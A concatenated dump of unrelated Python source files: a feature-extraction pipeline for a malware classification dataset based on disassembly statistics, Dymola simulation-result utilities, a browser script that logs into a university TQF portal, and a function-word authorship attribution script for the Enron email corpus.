function getcalls
input: list of lines in an asm file
output: dictionary with number of times each function is found
* count number of times each function occurs
"""
def getcalls(asmlines):
    """Count function names that appear after an '__stdcall ' marker.

    The name is the text directly after the first '__stdcall ' marker, cut off
    at the next '(' (matching declarations such as 'int __stdcall Foo(...)').
    Missing keys of the returned defaultdict read as 0.
    """
    calls = defaultdict(int)
    for line in asmlines:
        segments = line.split('__stdcall ')
        if len(segments) < 2:
            continue
        name = segments[1].split('(')[0]
        calls[name] += 1
    return calls
"""
function getdlls
input: list of lines in an asm file
output: dictionary with number of times each dll is found
* count number of times each dll occurs
"""
def getdlls(asmlines):
    """Count dll names referenced in the asm lines (case insensitive).

    The name is the token directly in front of the first '.dll'; quotes, angle
    brackets, backslashes and whitespace before it are peeled off step by step.
    Missing keys of the returned defaultdict read as 0.
    """
    dlls = defaultdict(int)
    for line in asmlines:
        parts = line.lower().split('.dll')
        if len(parts) < 2:
            continue
        token = parts[0].replace('\'', ' ')
        # strip every kind of delimiter that may precede the dll name,
        # in the same order as the original chained splits
        for delimiter in (' ', '"', '<', '\\', '\t'):
            token = token.split(delimiter)[-1]
        dlls[token] += 1
    return dlls
"""
function getopcodeseries
input: list of lines in an asm file
output: series of opcodes in the order in which they occur
* extract all opcodes using regular expressions
* first used to create opcode ngrams, but later translated to counts using series2freqs
"""
def getopcodeseries(asmlines):
    """Extract one opcode per asm line, in file order.

    The opcode is taken as the first run of lowercase letters enclosed in
    single spaces; lines without such a word contribute nothing.
    """
    opcode_pattern = re.compile('( )([a-z]+)( )')
    series = []
    for line in asmlines:
        match = opcode_pattern.search(line)
        if match is not None:
            series.append(match.group(2))
    return series
def series2freqs(series):
    """Tally how often each element occurs in *series* (missing keys read as 0)."""
    frequencies = defaultdict(int)
    for element in series:
        frequencies[element] += 1
    return frequencies
"""
function getqperc
input: list of lines in an asm file
output: percent of characters that is a questionmark
* count number of questionmarks and divide it by number of characters
"""
def getqperc(asmlines):
    """Return the fraction of characters in *asmlines* that are '?'.

    Raises ZeroDivisionError when the lines contain no characters at all,
    matching the character-by-character count it replaces.
    """
    total_chars = sum(len(line) for line in asmlines)
    question_marks = sum(line.count('?') for line in asmlines)
    return float(question_marks) / total_chars
"""
function countbysection
input: list of lines in an asm file, list of sections to include, list of characters to include
output: number of occurences of each specified character by section, list of feature names, list of characters included
* count number of occurences of each specified character by section
"""
def countbysection(asmlines,segms,chars=[' ','?','.',',',':',';','+','-','=','[','(','_','*','!','\\','/','\''],namesonly=False):
names=['%s_tot'%ss for ss in selsections]
for c in chars:
names.extend(['%s_c%s'%(ss,c) for ss in selsections])
if namesonly:
return names+['restsegm']+['%s_restchar'%ss for ss in selsections]
ns=len(segms)
nc=len(chars)
segmdict={e:i for i,e in enumerate(segms)}
chardict={e:i for i,e in enumerate(chars)}
counts=[0 for i in xrange((nc+1)*ns)]
for l in asmlines:
segm=l.split(':')[0]
if segm in segmdict:
s=segmdict[segm]
for ch in l:
counts[s]+=1
if ch in chardict:
c=chardict[ch]
counts[ns+c*ns+s]+=1
return counts,names,chars
"""
function normalizecountbysection
input: output of function countbysection
output: normalized number of occurences of each specified character by section
* divide number of occurences of each specified character by section by total number
* and calculate rest percent of other characters and other sections
"""
def normalizecountbysection(counts,names,chars):
    # Turn the raw counts of countbysection into proportions: per-character
    # fractions within each section, each section's share of all counted
    # characters, and 'rest' features holding the unaccounted remainder.
    d={names[i]:counts[i] for i in xrange(len(names))}
    tot=sum([d['%s_tot'%s] for s in selsections])
    d['restsegm']=1.0
    for s in selsections:
        d['%s_restchar'%s]=0.0
        # sections with zero characters keep all their features at 0
        if d['%s_tot'%s] > 0:
            d['%s_restchar'%s]=1.0
            for c in chars:
                d['%s_c%s'%(s,c)]=float(d['%s_c%s'%(s,c)])/d['%s_tot'%s]
                d['%s_restchar'%s]-=d['%s_c%s'%(s,c)]
            # the section total is normalized only after the per-character
            # fractions above used the raw value as their denominator
            d['%s_tot'%s]=float(d['%s_tot'%s])/tot
            d['restsegm']-=d['%s_tot'%s]
    return [d[name] for name in names+['restsegm']+['%s_restchar'%ss for ss in selsections]]
"""
function writeasmcontents
input: ids of trainset or testset, string "train" or "test"
output: writes train_asmcontents or test_asmcontents + metadata on sections, calls, dlls and opcodes
* extract features from contents of asm from all files in train or test set
* by reading list of asm lines from each file and calling the previous functions
"""
def writeasmcontents(ids,trainortest):
    # Extract content features from every .asm file and write them to
    # <trainortest>_asmcontents.csv; the raw per-file counts of sections,
    # calls, dlls and opcodes are additionally dumped to *metadata*.txt
    # sidecar files for later statistics (see getstatsfromdata).
    with open('%s_asmcontents.csv'%trainortest,'w') as f:
        w=csv.writer(f)
        w.writerow(
            ['sp_%s'%key for key in selsections]
            +['dl_%s'%key for key in seldlls]
            +['op_%s'%key for key in selopcs]
            +['qperc']
            +countbysection(None,selsections,namesonly=True)
            )
        # NOTE(review): the four sidecar files are closed manually at the end;
        # an exception inside the loop would leak them.
        fsec=open('secmetadata%s.txt'%trainortest,'w')
        wsec=csv.writer(fsec)
        fcal=open('calmetadata%s.txt'%trainortest,'w')
        wcal=csv.writer(fcal)
        fdll=open('dllmetadata%s.txt'%trainortest,'w')
        wdll=csv.writer(fdll)
        fopc=open('opcmetadata%s.txt'%trainortest,'w')
        wopc=csv.writer(fopc)
        for i in ids:
            with open('%s/'%trainortest+i+'.asm','r') as fasm:
                asmlines=[line for line in fasm.readlines()]
            # section counts/ proportions
            sc=getsectioncounts(asmlines)
            wsec.writerow([i]+['%s:%s'%(key,sc[key]) for key in sc if sc[key]>0])
            scsum=sum([sc[key] for key in sc])
            secfeat=[float(sc[key])/scsum for key in selsections]
            # calls
            cal=getcalls(asmlines)
            wcal.writerow([i]+['%s:%s'%(key,cal[key]) for key in cal if cal[key]>0])
            # dlls (raw counts, selected dlls only)
            dll=getdlls(asmlines)
            wdll.writerow([i]+['%s:%s'%(key,dll[key]) for key in dll if dll[key]>0])
            dllfeat=[float(dll[key]) for key in seldlls]
            # opcodes (raw counts, selected opcodes only)
            opc=series2freqs(getopcodeseries(asmlines))
            wopc.writerow([i]+['%s:%s'%(key,opc[key]) for key in opc if opc[key]>0])
            opcfeat=[float(opc[key]) for key in selopcs]
            # overall questionmark proportion
            qperc=getqperc(asmlines)
            # normalized interpunction characters by section
            ipbysecfeat=normalizecountbysection(*countbysection(asmlines,selsections))
            #
            w.writerow(secfeat+dllfeat+opcfeat+[qperc]+ipbysecfeat)
            f.flush()
        fsec.close()
        fcal.close()
        fdll.close()
        fopc.close()
######################################################
# reduce asm contents features, using a criterion on the number of files with nonzero value
"""
function writeasmcontents
input: traindata matrix, testdata matrix, feature names, criterion on required number of nonzeros in each column
output: reduced traindata matrix, testdata matrix and feature names
* calculate number of nonzeros by column and keep only features that meet the criterion
"""
def reducefeatures(xtrain,xtest,names,ncrit=500):
    """Keep only the feature columns that are non-zero in more than *ncrit* train rows.

    The column mask is derived from the train set alone and applied to both
    sets, so train and test keep identical column layouts.
    """
    nonzero_per_col = np.count_nonzero(np.asarray(xtrain), axis=0)
    keep = nonzero_per_col > ncrit
    reduced_train = np.asarray(xtrain)[:, keep]
    reduced_test = np.asarray(xtest)[:, keep]
    kept_names = [name for name, flag in zip(names, keep) if flag]
    return reduced_train, reduced_test, kept_names
"""
function reduceasmcontents
input: none
output: write reduced asm contents
* read features on asm contents, reduce them by calling reducefeatures and write the results
"""
def reduceasmcontents():
    # Load the extracted asm content features, drop the columns that are
    # non-zero in too few train files (default criterion of reducefeatures)
    # and write the reduced train/test matrices to *_asmcontents_red.csv.
    train_asmcontents,asmcontentshead=readdata('train_asmcontents.csv')
    test_asmcontents,_=readdata('test_asmcontents.csv')
    train_asmcontents_red,test_asmcontents_red,asmcontentshead_red=reducefeatures(
        train_asmcontents,test_asmcontents,asmcontentshead)
    writedata(train_asmcontents_red,'train_asmcontents_red.csv',asmcontentshead_red)
    writedata(test_asmcontents_red,'test_asmcontents_red.csv',asmcontentshead_red)
######################################################
# calculate statistics on asm metadata
"""
function loadmetadata
input: path of metadatafile (written by writeasmcontents)
output: dictionary with metadata
* load metadata into dictionary
"""
def loadmetadata(inpath):
    """Load a metadata csv written by writeasmcontents.

    Each row looks like '<id>,<key>:<count>,...'; the result maps every id to
    a defaultdict(int) of its key counts (missing keys read as 0). Only the
    last two ':'-separated fields of each entry are used as key and count.
    """
    metadata = {}
    with open(inpath, 'r') as infile:
        for row in csv.reader(infile):
            counts = defaultdict(int)
            for entry in row[1:]:
                key, value = entry.split(':')[-2:]
                counts[key] = int(value)
            metadata[row[0]] = counts
    return metadata
"""
function getstats
input: metadata dictionary, dictionary keys sorted by number of occurrences over train and test set, type of metadata (sec[tions], dll[s], cal[ls] or opc[odes])
output: statistics on the specified type of metadata
* calculate statistics on the specified type of metadata
"""
def getstats(dct,sortedkeys,datatype):
    # Per file id: number of distinct keys, total count, the share of the most
    # frequent key, and how many of the file's keys belong to the global top
    # 5/20/50 keys. `datatype` ('sec'/'dll'/'cal'/'opc') prefixes the stat names.
    stats={}
    for i in dct:
        stats[i]={}
        d=dct[i]
        n=len(d)
        sm=sum([d[key] for key in d]) if n>0 else 0
        # NOTE(review): with integer counts this is Python-2 floor division,
        # so pmx is a whole-number percentage.
        pmx=100*max([d[key] for key in d])/sm if n>0 else 0
        stats[i]['%s_nkey'%datatype]=n
        stats[i]['%s_sum'%datatype]=sm
        stats[i]['%s_pmax'%datatype]=pmx
        # NOTE(review): these three sets are the same for every i and could be
        # hoisted out of the loop.
        top5={key for key in sortedkeys[:5]}
        top20={key for key in sortedkeys[:20]}
        top50={key for key in sortedkeys[:50]}
        stats[i]['%s_n5key'%datatype]=len([e for e in d if e in top5])
        stats[i]['%s_n20key'%datatype]=len([e for e in d if e in top20])
        stats[i]['%s_n50key'%datatype]=len([e for e in d if e in top50])
    return stats
"""
function getstatsfromdata
input: type of metadata (sec[tions], dll[s], cal[ls] or opc[odes])
output: statistics on the specified type of metadata for both trainset and testset
* for each value, count the number of occurrences over train and test set
* call getstats to calculate statistics for each file
"""
def getstatsfromdata(datatype):
    # Load the train and test metadata for one data type, rank all keys by the
    # number of files (train + test) they occur in, and derive per-file stats.
    traindict=loadmetadata('%smetadatatrain.txt'%datatype)
    testdict=loadmetadata('%smetadatatest.txt'%datatype)
    # allkeys[key] = number of files in which `key` occurs at all
    allkeys=defaultdict(int)
    for i in traindict:
        for key in traindict[i]:
            allkeys[key]+=1
    for i in testdict:
        for key in testdict[i]:
            allkeys[key]+=1
    # most common keys first
    sortedkeys=sorted([key for key in allkeys],reverse=True,key=lambda x: allkeys[x])
    trainstats=getstats(traindict,sortedkeys,datatype)
    teststats=getstats(testdict,sortedkeys,datatype)
    return trainstats,teststats
"""
function writeasmstats
input: feature types (use only default; why is this a parameter??? I don't remember)
output: writes asm statistics to files for both train and test set
* call getstatsfromdata to calculate statistics on sec[tions], dll[s], cal[ls] and opc[odes]
* write the results to train_asmstats and test_asmstats
"""
def writeasmstats(stats=['nkey', 'sum', 'pmax', 'n5key', 'n20key', 'n50key']):
    # Combine the metadata statistics of all four data types into one row per
    # file and write them to train_asmstats.csv / test_asmstats.csv.
    # NOTE(review): mutable default list `stats`; safe because it is only read.
    traindata=[[] for i in xrange(len(trainids))]
    testdata=[[] for i in xrange(len(testids))]
    names=[]
    for datatype in ['sec','dll','cal','opc']:
        keys=['%s_%s'%(datatype,stat) for stat in stats]
        trainstats,teststats=getstatsfromdata(datatype)
        for inum,i in enumerate(trainids):
            traindata[inum].extend([trainstats[i][key] for key in keys])
        for inum,i in enumerate(testids):
            testdata[inum].extend([teststats[i][key] for key in keys])
        names.extend(keys)
    writedata(traindata,'train_asmstats.csv',names)
    writedata(testdata,'test_asmstats.csv',names)
######################################################
# extract bytes contents
"""
function getcompressedsize_str
input: string
output: compressed size of string
* compress string and return the compressed size
"""
def getcompressedsize_str(strinput):
inMemoryOutputFile = BytesIO()
zf = zipfile.ZipFile(inMemoryOutputFile, 'w')
zf.writestr('',strinput, compress_type=zipfile.ZIP_DEFLATED)
return zf.infolist()[0].compress_size
"""
function writeblocksizes
input: ids of trainset or testset, string "train" or "test"
output: writes train_blocksizes or test_blocksizes
* calculate and write compressed size of each 4 kB block for all files in train or test set
"""
def writeblocksizes(ids,trainortest,blocksize=256): # 256 lines of 16 bytes = 4096 bytes per block by default
    """Write the deflated size of every *blocksize*-line block of each .bytes file.

    Output: '<trainortest>_blocksizes.csv' with one row per id:
    '<id>,<size of block 0>,<size of block 1>,...,'. Only the part of each
    line after the first space (and without the trailing newline) is
    compressed; any incomplete trailing block is ignored.
    """
    with open('%s_blocksizes.csv'%trainortest,'w') as fout:
        for i in ids:
            with open('%s/%s.bytes'%(trainortest,i),'r') as fin:
                contents=fin.readlines()
            fout.write('%s,'%i)
            # honor the blocksize argument (it used to be overwritten by a
            # hard-coded 256 here, so the parameter had no effect)
            nblock = len(contents)//blocksize
            for b in range(nblock):
                block_lines = contents[b*blocksize:(b+1)*blocksize]
                # join instead of repeated += to avoid quadratic string building
                strinput = ''.join(l[l.find(' ')+1:-1] for l in block_lines)
                s=getcompressedsize_str(strinput)
                fout.write('%d,'%s)
            fout.write('\n')
"""
function writeblocksizedistributions
input: string "train" or "test"
output: writes train_blocksizedistributions or test_blocksizedistributions
* calculate statistics on files with blocksizes to get the same number of features for each file
"""
def writeblocksizedistributions(trainortest):
    # Summarize each file's variable-length list of block sizes into a fixed
    # set of statistics: percentiles of the sorted sizes, the overall mean and
    # the means of four consecutive quarters of the (unsorted) sequence.
    with open('%s_blocksizes.csv'%trainortest,'r') as f:
        with open('%s_blocksizedistributions.csv'%trainortest,'w') as fout:
            fout.write('cs4k_min,cs4k_p10,cs4k_p20,cs4k_p30,cs4k_p50,cs4k_p70,cs4k_p80,cs4k_p90,cs4k_max,cs4k_mean,cs4k_q1mean,cs4k_q2mean,cs4k_q3mean,cs4k_q4mean\n')
            for i,l in enumerate(f):
                ls=l.split(',')
                # drop the leading id and the empty field after the last comma
                sizes=[float(e) for e in ls[1:-1]]
                slen=len(sizes)
                # NOTE(review): Python-2 integer division; under Python 3 this
                # would yield a float and the slices below would raise TypeError.
                qlen=1 if slen/4<1 else slen/4
                q1m=np.mean(sizes[:qlen])
                q2m=np.mean(sizes[qlen:2*qlen])
                q3m=np.mean(sizes[-2*qlen:-qlen])
                q4m=np.mean(sizes[-qlen:])
                sizes=sorted(sizes)
                maxidx=slen-1
                fout.write('%.0f,%.0f,%.0f,%.0f,%.0f,%.0f,%.0f,%.0f,%.0f,%.0f,%.0f,%.0f,%.0f,%.0f\n'%(
                    sizes[0],
                    sizes[10*maxidx//100],
                    sizes[20*maxidx//100],
                    sizes[30*maxidx//100],
                    sizes[50*maxidx//100],
                    sizes[70*maxidx//100],
                    sizes[80*maxidx//100],
                    sizes[90*maxidx//100],
                    sizes[-1],
                    round(np.mean(sizes)),
                    q1m,q2m,q3m,q4m))
######################################################
# build combined train and test files
"""
function writecombifile
input: list of lists with 2 entries: file name and optional feature names (None for all), filename to write results to
output: writes file with combined feature sets
* combine features from different sets into a single file
* ids, labels and header are optional
"""
def writecombifile(sourcefilesandselections,filename,includeid=True,includelabel=True,header=True):
    # Horizontally concatenate several per-file feature csv's into a single
    # train_<filename> / test_<filename> pair; ids, labels and the header row
    # are optional. Test rows receive the dummy label -1.
    nsource=len(sourcefilesandselections)
    for trainortest in ['train','test']:
        alldata=[]
        allnames=[]
        for source,selection in sourcefilesandselections:
            # selection=None keeps all columns of that source file
            data,names=readdata('%s_%s'%(trainortest,source),selectedcols=selection)
            alldata.append(data)
            allnames.extend(names)
        with open('%s_%s'%(trainortest,filename),'w') as f:
            w=csv.writer(f)
            if header:
                w.writerow((['Id'] if includeid else [])+
                    allnames+
                    (['Class'] if includelabel else []))
            ids = trainids if trainortest=='train' else testids
            for inum,i in enumerate(ids):
                datarow=[]
                for src in xrange(nsource):
                    datarow.extend(alldata[src][inum])
                w.writerow(
                    ([i] if includeid else [])+
                    datarow+
                    ([labels[inum] if trainortest=='train' else -1] if includelabel else []))
######################################################
# go
if __name__ == '__main__':
    # Full extraction pipeline: file properties, asm content features (plus a
    # reduced variant), metadata statistics and compressed block sizes,
    # followed by three combined feature files.
    writefileprops(trainids,'train')
    writefileprops(testids,'test')
    writeasmcontents(trainids,'train')
    writeasmcontents(testids,'test')
    reduceasmcontents()
    writeasmstats()
    writeblocksizes(trainids,'train')
    writeblocksizes(testids,'test')
    writeblocksizedistributions('train')
    writeblocksizedistributions('test')
    # combination written to {train,test}_20.csv (no id/label/header)
    writecombifile(
        (
            ['fileprops.csv',None],
            ['asmcontents.csv',
                ['sp_%s'%key for key in selsections]
                +['dl_%s'%key for key in seldlls]
                +['op_%s'%key for key in selopcs]
                +['qperc']
                +[e for e in countbysection(None,selsections,namesonly=True) if e.endswith('_c?')]
            ],
        ),
        '20.csv',
        includeid=False,
        includelabel=False,
        header=False
    )
    # combination written to {train,test}_28_std.csv (no id/label/header)
    writecombifile(
        (
            ['fileprops.csv',None],
            ['asmcontents.csv',
                ['dl_%s'%key for key in seldlls]
                +['op_%s'%key for key in selopcs]
                +['qperc']
                +countbysection(None,selsections,namesonly=True)
            ],
        ),
        '28_std.csv',
        includeid=False,
        includelabel=False,
        header=False
    )
    # combination written to {train,test}_45c.csv (header kept, no id/label)
    writecombifile(
        (
            ['fileprops.csv',None],
            ['asmcontents_red.csv',
                ['dl_%s'%key for key in seldlls]
                +['op_%s'%key for key in selopcs]
                +['qperc']
                +countbysection(None,selsections,namesonly=True)
            ],
            ['asmstats.csv',None],
            ['blocksizedistributions.csv',None],
        ),
        '45c.csv',
        includeid=False,
        includelabel=False
    )
| true |
986daa339aea83c63417e94b6d34ec9e2a961453 | Python | BrechtBa/dympy | /dympy/util.py | UTF-8 | 4,657 | 2.953125 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env/ python
################################################################################
# Copyright (c) 2016 Brecht Baeten
# This file is part of dympy.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
######################################################################################
import numpy as np
import scipy.io
def get_value_array(res,key):
    """
    Creates an array from result keys with the same name but different indices

    Parameters
    ----------
    res : dict
        results dictionary
    key : string
        variable name without the index brackets

    Returns
    -------
    val : numpy.ndarray
        nd array with the time dimension first and the (1-based) result array
        dimensions behind it

    Examples
    --------
    >>> get_value_array({'time':[0,43200,86400],'u[1]':[1000,5000,2000],'u[2]':[2000,8000,3000]},'u')
    """
    # find the dimensions of the result: the largest (1-based) index that
    # occurs for each dimension equals the size of that dimension.
    # Bugfix: the index string previously included the opening '[' (which made
    # int() raise), and a stray debug print was removed.
    prefix = key + '['
    index_list = None
    for k in res:
        if k[:len(prefix)] == prefix:
            index_string = k[len(prefix):-1]
            temp_index_list = np.array([int(x) for x in index_string.split(',')])
            index_list = temp_index_list if index_list is None else np.maximum(index_list, temp_index_list)
    if index_list is None:
        raise KeyError('no keys matching "{}[...]" in res'.format(key))
    # create an empty value array with time as the first dimension
    val = np.zeros(np.append(len(res['time']), index_list))
    # fill the array by iterating over all non-time dimensions; the result
    # keys use 1-based indices while the numpy array is 0-based, so the key is
    # built from multi_index + 1 (the previous 0-based, trailing-comma key
    # format never matched the parsed keys above)
    it = np.nditer(val[0,:], flags=['multi_index'])
    while not it.finished:
        index_string = ','.join(str(i+1) for i in it.multi_index)
        val[(Ellipsis,)+it.multi_index] = res[key + '[{}]'.format(index_string)]
        it.iternext()
    return val
def get_children(res,key):
    """
    Returns all keys in res that start with key

    Parameters
    ----------
    res : dict
        results dictionary
    key : string
        a search key; the empty string returns all keys

    Returns
    -------
    keys : list
        list of keys that start with key (all keys when key is '')

    Examples
    --------
    >>> get_children({'time':[0,43200,86400],'A.B':[1000,5000,2000],'A.C':[2000,8000,3000]},'A')
    """
    if key == '':
        return res.keys()
    return [k for k in res.keys() if k.startswith(key)]
def savemat(filename,data,order=None):
    """
    Write a MATLAB v4 binary file in the 'Atrajectory' layout Dymola expects.

    Parameters
    ----------
    filename : string
        path of the file to write
    data : dict
        dictionary with name, value pairs; values are equally long sequences
    order : list
        optional list of keys giving the variable order in the saved file
        (e.g. to force 'time' first)

    Examples
    --------
    >>> savemat('res.mat', {'time':[0,43200,86400],'u':[1000,5000,2000]}, order=['time'])
    """
    # header block identifying the file as a trajectory result
    Aclass = ['Atrajectory ',
              '1.0 ',
              'Generated from Matlab']
    # make sure the requested order (typically time first) is honoured
    names,values = dict2list(data,order)
    # BUG FIX: removed `values = zip(*data)`, which overwrote the real data
    # with a zip over the dict KEYS (i.e. the characters of the variable
    # names), so the written 'data' matrix was garbage.
    scipy.io.savemat( filename, {'Aclass': Aclass}, appendmat=False, format='4')
    with open(filename, 'ab') as f:
        scipy.io.savemat(f, {'names': names}, format='4')
    with open(filename, 'ab') as f:
        scipy.io.savemat(f, {'data': values}, format='4')
def dict2list(data,order=None):
    """
    Split a dictionary into a list of keys and a matching list of values.

    Parameters
    ----------
    data : dict
        dictionary with name, value pairs
    order : list
        optional list of keys to place first, in the given order

    Returns
    -------
    names : list
        keys, with any ``order`` entries first
    values : list
        data[key] for each entry of names, in the same order

    Examples
    --------
    >>> dict2list({'time':[0,43200,86400],'u':[1000,5000,2000]})
    (['time', 'u'], [[0, 43200, 86400], [1000, 5000, 2000]])
    """
    names = []
    # first add the keys requested explicitly
    # (idiom fix: `is not None` instead of `!= None`)
    if order is not None:
        names.extend(order)
    # then append the remaining keys in insertion order; a set keeps the
    # membership test O(1) instead of scanning the list each time
    seen = set(names)
    for key in data:
        if key not in seen:
            names.append(key)
            seen.add(key)
    # look up the values in the same order as the names
    values = [data[key] for key in names]
    return names,values
| true |
67ef96c5e268334de836419bdde618840812f181 | Python | tanwaarpornthip/psuPortal | /scripts/TQF_filler/TQF_filler.py | UTF-8 | 1,829 | 2.546875 | 3 | [] | no_license | import sys
import time
import random
import pickle
import simplejson
import splinter
# Declare constants here
targetURL = 'https://tqf-phuket.psu.ac.th'
# Frequently used objects
Browser = splinter.Browser
def openNewSession():
    """Launch a visible Chrome session and return the splinter browser handle."""
    # Headless/incognito variant kept for reference:
    # return Browser('chrome', incognito=True, headless=True)
    return Browser('chrome')
def closeSession(browser):
    """Terminate the given browser session and release its resources."""
    browser.quit()
def mainSession(browser, inputFile):
    """Log into the TQF portal and echo the remaining work items from the input file.

    The input file layout is: a header line, then the path to a credential
    file (which itself holds: header, username, header, password), then one
    work item per line; lines starting with '#' are comments.
    """
    browser.visit(targetURL)
    # First line is a header; the second holds the credential file path.
    inputFile.readline()
    # BUG FIX: rstrip('\n') instead of [:-1] — slicing chopped the last
    # character of a final line that has no trailing newline.
    credentialLocation = inputFile.readline().rstrip('\n')
    with open(credentialLocation) as credentialFile:
        credentialFile.readline()
        username = credentialFile.readline().rstrip('\n')
        credentialFile.readline()
        password = credentialFile.readline().rstrip('\n')
    # SECURITY FIX: removed print(username, password) — never echo
    # credentials to stdout/logs.
    browser.fill("ctl00$MainContent$Login1$UserName", username)
    browser.fill("ctl00$MainContent$Login1$Password", password)
    browser.find_by_id('MainContent_Login1_BtnSignin').first.click()
    for line in inputFile:
        # BUG FIX: startswith avoids IndexError on empty lines
        # (the old `line[0] != '#'` crashed on "").
        if not line.startswith('#'):
            print(line.rstrip('\n'))
# Script entry point: open a browser session and drive it from input.txt.
if __name__ == "__main__":
    # Taking number of times input from command line
    # If not given, just one time.
    with open('input.txt','r') as inputFile:
        browser = openNewSession()
        mainSession(browser,inputFile)
    # Selected choices, first index of each element is the selection choice
| true |
9a360e172d6daa5cc509d926648ec98540b12770 | Python | tripp-maloney/enron_corpus_attribution | /punct_enron.py | UTF-8 | 7,614 | 3.046875 | 3 | [] | no_license | """
fwa_enron.py
- Tripp Maloney, 2019
This script takes a tsv extracted from the Enron email corpus and tests how effectively function word analysis can distinguish authorship.
"""
import numpy as np
import argparse
from sklearn.naive_bayes import MultinomialNB
from collections import Counter
def load_function_words(resource_path):
    """Read a newline-separated word file; return lowercased, stripped entries.

    Blank lines are skipped.
    """
    with open(resource_path, 'r') as handle:
        return [line.lower().strip() for line in handle if line.strip()]
def load_texts(path):
    """Parse a TSV corpus file.

    Each line is lowercased and tab-split; column 1 is the author and the
    last column the text. Returns (authors, texts, raw_lines) — the raw
    lines are returned unmodified.
    """
    with open(path, 'r', encoding='utf-8') as handle:
        lines = handle.readlines()
    authors, texts = [], []
    for raw in lines:
        parts = raw.lower().strip().split("\t")
        authors.append(parts[1])
        texts.append(parts[-1])
    return authors, texts, lines
def unison_shuffle(a, b, c):
    """Shuffle three same-length arrays in place with ONE shared permutation.

    The RNG state is captured once and restored before each shuffle so all
    three arrays receive the identical permutation.
    """
    rng_state = np.random.get_state()
    np.random.shuffle(a)
    np.random.set_state(rng_state)
    np.random.shuffle(b)
    # BUG FIX: the state must be restored again before shuffling c; the old
    # code shuffled c with an advanced RNG state, so the index array no
    # longer corresponded to the shuffled data/labels.
    np.random.set_state(rng_state)
    np.random.shuffle(c)
def split_dataset(X, y, hold_out_percent):
    """shuffle and split the dataset. Returns two tuples:
    (X_train, y_train, train_indices): train inputs
    (X_val, y_val, val_indices): validation inputs"""
    # one shared permutation over rows, labels and their original indices
    index = np.arange(X.shape[0])
    unison_shuffle(X, y, index)
    # hold_out_percent is the TRAIN fraction; everything after the cut is
    # the validation split
    cut = int(np.ma.size(y) * hold_out_percent)
    return (
        (X[:cut, :], y[:cut], index[:cut]),
        (X[cut:, :], y[cut:], index[cut:]),
    )
def zero_rule_algorithm(train, test):
    """Most-frequent-class baseline: predict the training majority label for every test row."""
    labels = list(train)
    majority = max(set(labels), key=labels.count)
    return np.asarray([majority] * len(test))
def accuracy_scorer(array1, array2):
    """Count the positions at which the two arrays agree."""
    matches = array1 == array2
    return np.sum(matches)
def narrow_scope(authors, lines):
    """Bucket corpus lines by whether their author ranks in the top 2/5/10/50.

    Returns four lists (top-2, top-5, top-10, top-50 authors' lines); a line
    whose author is in a smaller bucket also appears in every larger one,
    since most_common(k) is a prefix of most_common(k') for k < k'.
    """
    counts = Counter(authors)
    tops = [set(a for a, _ in counts.most_common(k)) for k in (2, 5, 10, 50)]
    buckets = ([], [], [], [])
    for line in lines:
        author = line.lower().strip().split("\t")[1]
        for top, bucket in zip(tops, buckets):
            if author in top:
                bucket.append(line)
    return buckets
def fwa(lines, vocab_path):
    """Build an authorship attribution classifier using MultinomialNaiveBayes for two authors.
    Returns a basic report of MultinomialNB predictions on the test data (10% of input),
    compared to a zero method baseline. Evaluates and reports the most accurate method.

    lines: TSV corpus lines (column 1 = author, last column = text).
    vocab_path: path to the newline-separated feature-word list.
    Returns (zr_pct, nb_pct, bin_pct) — accuracy percentages as strings.
    """
    function_words = load_function_words(vocab_path)
    # split the corpus lines into texts ("reviews") and author labels
    reviews = []
    authors = []
    for line in lines:
        fields = line.strip().lower().split("\t")
        reviews.append(fields[-1])
        authors.append(fields[1])
    labels = np.asarray(authors)
    # Make review - f-word array: one count column per function word
    # NOTE(review): np.int is deprecated/removed in modern numpy — this line
    # presumably targets an older numpy; verify before upgrading.
    review_features = np.zeros((len(reviews), len(function_words)), dtype=np.int)
    for i, review in enumerate(reviews):
        review_toks = review.split(" ")
        for j, function_word in enumerate(function_words):
            review_features[i, j] = len([w for w in review_toks if w == function_word])
    # split into training and testing arrays (0.9 = 90% train, 10% held out)
    train, test = split_dataset(review_features, labels, 0.9)
    # create binary version of the same arrays (presence/absence features)
    train_binary = np.copy(train[0])
    test_binary = np.copy(test[0])
    def f(x):
        return 1 if x > 0 else 0
    f = np.vectorize(f)
    train_binary = f(train_binary)
    test_binary = f(test_binary)
    # implement and print score for zero rule classifier (majority-class baseline)
    zero_rule_predictions = zero_rule_algorithm(train[1], test[0])
    print("Baseline Predictions:")
    print(list(zero_rule_predictions))
    print()
    # check accuracy
    zr_acc = accuracy_scorer(zero_rule_predictions, test[1])
    zr_pct = "%.3f" % (zr_acc / len(test[1]) * 100)
    print(f'{zr_acc} of {len(test[1])}, {zr_pct}% correct\n')
    # use MultinomialNB to predict classes from the integer count features
    nb_izer = MultinomialNB()
    nb_izer.fit(train[0], train[1])
    nb_predictions = nb_izer.predict(test[0])
    print("Naive Bayes Predictions:")
    print(list(nb_predictions))
    print()
    # check accuracy
    nb_acc = accuracy_scorer(nb_predictions, test[1])
    nb_pct = "%.3f" % (nb_acc / len(test[1]) * 100)
    print(f'{nb_acc} of {len(test[1])}, {nb_pct}% correct\n')
    # re-implement on binary array (same classifier, boolean features)
    nb_izer.fit(train_binary, train[1])
    nb_binary = nb_izer.predict(test_binary)
    print("Binary NB Predictions:")
    print(list(nb_binary))
    print()
    # check accuracy
    bin_acc = accuracy_scorer(nb_binary, test[1])
    bin_pct = "%.3f" % (bin_acc / len(test[1]) * 100)
    print(f'{bin_acc} of {len(test[1])}, {bin_pct}% correct\n')
    # print the actual authors for comparison. This is probably superfluous.
    print("Actual Authors:")
    print(list(test[1]))
    print()
    # determine best test on this run (ties resolve in the listed order)
    if max(zr_acc, nb_acc, bin_acc) == zr_acc:
        print("Tests did not beat baseline.")
    elif nb_acc == bin_acc > zr_acc:
        print("Best test: Naive Bayes, integers OR boolean.")
    elif max(zr_acc, nb_acc, bin_acc) == nb_acc:
        print("Best method: Naive Bayes with integers.")
    elif max(zr_acc, nb_acc, bin_acc) == bin_acc:
        print("Best method: Naive Bayes with booleans.")
    else:
        print("Something strange has happened.")
    return zr_pct, nb_pct, bin_pct
